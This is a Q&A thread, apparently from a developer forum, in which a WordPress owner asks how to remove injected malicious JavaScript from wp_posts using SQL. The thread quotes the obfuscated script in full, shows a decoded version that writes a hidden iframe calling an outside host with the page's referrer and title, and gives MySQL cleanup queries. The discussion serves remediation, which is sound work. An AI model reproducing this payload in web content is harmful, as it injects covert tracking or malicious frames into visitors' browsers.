# Replace complicated string in MySQL

Tags: php, mysql, sql, wordpress

Some script kiddie hacked my wordpress website and inserted this code into every post_content in wp_posts:

```
<!--844c7b74e31d727d5814a0ed667c0255--><script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(9(){2 d=3;2 4=1;2 5=1;2 t=d.a(\'b\');2 6=7.c(7.e()*f);2 0=\'g://h.i/j/k?\';0=0+\'l=\'+3.m;0=0+\'&n=\'+3.o;0=0+\'&r=\'+6;d.p(\'<8 q="s:u;v:w" 0="\'+0+\'" x="\'+4+\'" y="\'+5+\'"></8>\')})();',35,35,'src||var|document|razmw|razmh|id|Math|iframe|function|createElement|script|floor||random|9999|http|needalogo|net|rotation|3wBsvV|se_referrer|referrer|default_keyword|title|write|style||padding||0px|border|none|width|height'.split('|'),0,{}))</script>
```

I want to remove it by SQL query (UPDATE xxx SET replace(...)) in phpmyadmin, but I have no luck with escaping the string.

is there any way/tool to correctly escape this code and remove it from the table? thx

Answer (score 0):

if the data is same and at the start of a post or at the end of the post you can use substring function to single out your data from this garbage

```
update table_name set column_name = SUBSTRING(column_name,garbage_length) where 1;
```

for more information see the manual
http://dev.mysql.com/doc/refman/5.7/en/string-functions.html#function_substring

you can use position function to point out the starting of the garbage.
http://dev.mysql.com/doc/refman/5.7/en/string-functions.html#function_position

Comment: there are couple of variations, so this could lead to removing parts of my posts :-/ is there a function that could remove everything after the initial hash number? that seems to be the same in all rows...

Comment: are the initial hash number same??

Comment: then use position function to determine starting of the garbage to discard it. http://dev.mysql.com/doc/refman/5.7/en/string-functions.html#function_position

Comment: thanks, in the end i used this `UPDATE wp_posts SET post_content = SUBSTRING_INDEX(post_content, '<!--844c7b74e31d727d5814a0ed667c0255-->', 1)`

Answer (score 0):

Just looked at the code and it appears to evaluate out to:-

```
(function()
    {
    var d=document;
    var razmw=1;
    var razmh=1;
    var t=d.createElement('script');
    var id=Math.floor(Math.random()*9999);
    var src='http://needalogo.net/rotation/3wBsvV?';
    src=src+'se_referrer='+document.referrer;
    src=src+'&default_keyword='+document.title;
    src=src+'&r='+id;
    d.write('<iframe style="padding:0px;
    border:none" src="'+src+'" width="'+razmw+'" height="'+razmh+'"></iframe>')
}
)();
```

which appears to be inserting an iframe (1px x 1px) with a source returned from some web page (with a few parameters passed). The URL is blocked by my firewall.